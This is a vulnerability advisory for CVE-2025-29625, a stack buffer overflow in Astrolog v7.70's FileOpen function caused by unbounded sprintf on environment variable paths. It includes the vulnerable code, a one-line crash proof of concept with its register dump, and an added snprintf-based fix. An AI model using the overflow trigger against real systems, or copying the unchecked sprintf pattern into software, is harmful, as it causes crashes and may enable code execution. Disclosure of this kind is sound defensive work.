Buffer Overflow Vulnerability in Astrolog v7.70 (CVE-2025-29625)

Amir M. Jahangirzad - 3 min read

Overview

A buffer overflow vulnerability has been discovered in Astrolog v7.70, a popular open-source astrology program. An attacker who can set an overly long environment variable that the FileOpen function reads can crash the program (Denial of Service) or potentially execute arbitrary code.

  • CVE ID: CVE-2025-29625
  • Vulnerability Type: Buffer Overflow
  • Impact: Remote Code Execution (RCE) & Denial of Service (DoS)
  • Attack Vector: Local (via environment variables)

Technical Details

The vulnerability exists in the following section of the FileOpen function, where the program reads environment variables and builds file paths into the fixed-size buffer sz with sprintf, without checking that the result fits:

#ifdef ENVIRON
    // Next look for the file in the directory indicated by the version
    // specific system environment variable.
    sprintf(sz, "%s%s", ENVIRONVER, szVerCore);
    env = getenv(sz);
    if (env && *env) {
      sprintf(sz, "%s%c%s", env, chDirSep, szFileT);
      file = fopen(sz, szMode);
      if (file != NULL)
        goto LDone;
    }

    // Next look in the directory in the general environment variable.
    env = getenv(ENVIRONALL);
    if (env && *env) {
      sprintf(sz, "%s%c%s", env, chDirSep, szFileT);
      file = fopen(sz, szMode);
      if (file != NULL)
        goto LDone;
    }

    // Next look in directory in the version prefix environment variable.
    env = getenv(ENVIRONVER);
    if (env && *env) {
      sprintf(sz, "%s%c%s", env, chDirSep, szFileT);
      file = fopen(sz, szMode);
      if (file != NULL)
        goto LDone;
    }
#endif

Root Cause

  • The function retrieves environment variables using getenv().
  • Each value is concatenated with a directory separator and the file name into the sz buffer using sprintf(), which writes as many bytes as the format produces and performs no bounds checking.
  • If an attacker sets an excessively long environment variable value, the resulting path exceeds the size of sz, the buffer overflows, and the adjacent stack memory is corrupted, which can lead to arbitrary code execution.
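As an added example (not Astrolog's own code and not part of the original advisory), the following C shows the bounded form of the same lookup: the path is built with snprintf limited to the buffer size, the return value is checked for truncation, and an oversized environment value is skipped instead of written past the end of sz. The buffer size CCH_SZ_MAX, the variable name ASTROLOG_SHORT and the fake_getenv environment are constructed for this demonstration; the page does not give the real size of Astrolog's sz buffer.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Assumed buffer size for this example only; the advisory does not state the
 * real size of Astrolog's sz buffer. */
#define CCH_SZ_MAX 256

/* Bounded replacement for the advisory's `sprintf(sz, "%s%c%s", env, chDirSep, szFileT)`.
 * Writes "<dir><sep><file>" into sz only if it fits, including the terminating NUL;
 * otherwise leaves sz as an empty string and reports failure instead of overflowing. */
bool join_path_bounded(char *sz, size_t cchSz, const char *dir, char chDirSep, const char *file)
{
    if (sz == NULL || cchSz == 0 || dir == NULL || file == NULL)
        return false;
    /* snprintf returns the length it would have produced; >= cchSz means truncation. */
    int n = snprintf(sz, cchSz, "%s%c%s", dir, chDirSep, file);
    if (n < 0 || (size_t)n >= cchSz) {
        sz[0] = '\0';
        return false;
    }
    return true;
}

/* The environment-directory lookup from the advisory with the bound check applied
 * to every value. `lookup` has getenv()'s signature so the real getenv can be passed
 * in production; the demo passes a fake so it runs without touching the environment.
 * `rejected` counts values that were too long to form a path. */
FILE *open_from_env_dirs(const char *const *varnames, size_t nvars, const char *szFileT,
                         const char *szMode, char chDirSep,
                         char *(*lookup)(const char *), size_t *rejected)
{
    char sz[CCH_SZ_MAX];
    *rejected = 0;
    for (size_t i = 0; i < nvars; i++) {
        const char *env = lookup(varnames[i]);
        if (env == NULL || *env == '\0')
            continue;
        if (!join_path_bounded(sz, sizeof sz, env, chDirSep, szFileT)) {
            (*rejected)++;   /* oversized value: skip this directory, stack stays intact */
            continue;
        }
        FILE *file = fopen(sz, szMode);
        if (file != NULL)
            return file;
    }
    return NULL;
}

/* Constructed environment: ASTROLOG holds 1024 'A's exactly as in the PoC command,
 * ASTROLOG_SHORT (a made-up name) holds a normal directory. */
static char g_oversized[1025];

static char *fake_getenv(const char *name)
{
    if (strcmp(name, "ASTROLOG") == 0) {
        memset(g_oversized, 'A', sizeof g_oversized - 1);
        g_oversized[sizeof g_oversized - 1] = '\0';
        return g_oversized;
    }
    if (strcmp(name, "ASTROLOG_SHORT") == 0)
        return "/tmp";
    return NULL;
}

/* Returns true when a normal-length directory joins correctly into a CCH_SZ_MAX buffer. */
bool demo_short_value_fits(void)
{
    char sz[CCH_SZ_MAX];
    return join_path_bounded(sz, sizeof sz, "/tmp", '/', "astrolog.dat")
        && strcmp(sz, "/tmp/astrolog.dat") == 0;
}

/* Runs the hardened lookup against the constructed environment and returns how many
 * values were rejected for length: the PoC-sized ASTROLOG value gives 1, while the
 * short value is accepted (fopen may still fail, which is an ordinary "not found"). */
size_t count_rejected_env_values(void)
{
    static const char *const names[] = { "ASTROLOG", "ASTROLOG_SHORT" };
    size_t rejected = 0;
    FILE *f = open_from_env_dirs(names, 2, "astrolog.dat", "r", '/', fake_getenv, &rejected);
    if (f != NULL)
        fclose(f);
    return rejected;
}

int main(void)
{
    printf("short value fits: %d\n", demo_short_value_fits());
    printf("rejected oversized values: %zu\n", count_rejected_env_values());
    return 0;
}
```

The check on snprintf's return value is what matters: snprintf alone would silently truncate the path, and a truncated path can still open the wrong file, so a value that does not fit is treated as "this location does not exist" rather than as a shorter path.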

Proof of Concept (PoC)

The following PoC demonstrates how setting an overly long environment variable triggers a crash:

The PoC

export ASTROLOG=$(python3 -c 'print("A" * 1024)'); ./astrolog; dmesg | tail -n 10

The Output

[reo@Reodus Astrolog]$ export ASTROLOG=$(python3 -c 'print("A" * 1024)'); ./astrolog; dmesg | tail -n 9
[1]    3510 segmentation fault (core dumped)  ./astrolog
[18678.065821] RIP: 0033:0x64ea8d9d6c33
[18678.065824] Code: 00 00 e8 80 c6 fe ff 48 89 df e8 54 8b 0b 00 c7 05 7e 6b 11 00 01 00 00 00 48 81 c4 08 03 00 00 5b 5d 41 5c 41 5d 41 5e 41 5f <c3> 48 89 e0 e9 35 ff ff ff 48 8d ac 24 00 02 00 00 48 89 ef e8 69
[18678.065825] RSP: 002b:00007fff132395c8 EFLAGS: 00010202
[18678.065827] RAX: 0000000000000000 RBX: 4141414141414141 RCX: 000064ea8da972e7
[18678.065828] RDX: 0000000000000000 RSI: 0000795f29f07518 RDI: 000064ea8dac78b0
[18678.065829] RBP: 4141414141414141 R08: 00007fff13239134 R09: 0000000000000000
[18678.065830] R10: 0000000000000018 R11: 0000000000000006 R12: 4141414141414141
[18678.065831] R13: 4141414141414141 R14: 4141414141414141 R15: 4141414141414141
[18678.065831] FS:  0000795f29f0d0c0 GS:  0000000000000000

Exploitation Impact

  • Denial of Service (DoS): The program crashes due to memory corruption; the register dump above shows RBX, RBP and R12 through R15 filled with 0x41 ('A') bytes from the environment value.
  • Arbitrary Code Execution: Under certain conditions, an attacker could overwrite return addresses and execute arbitrary code.
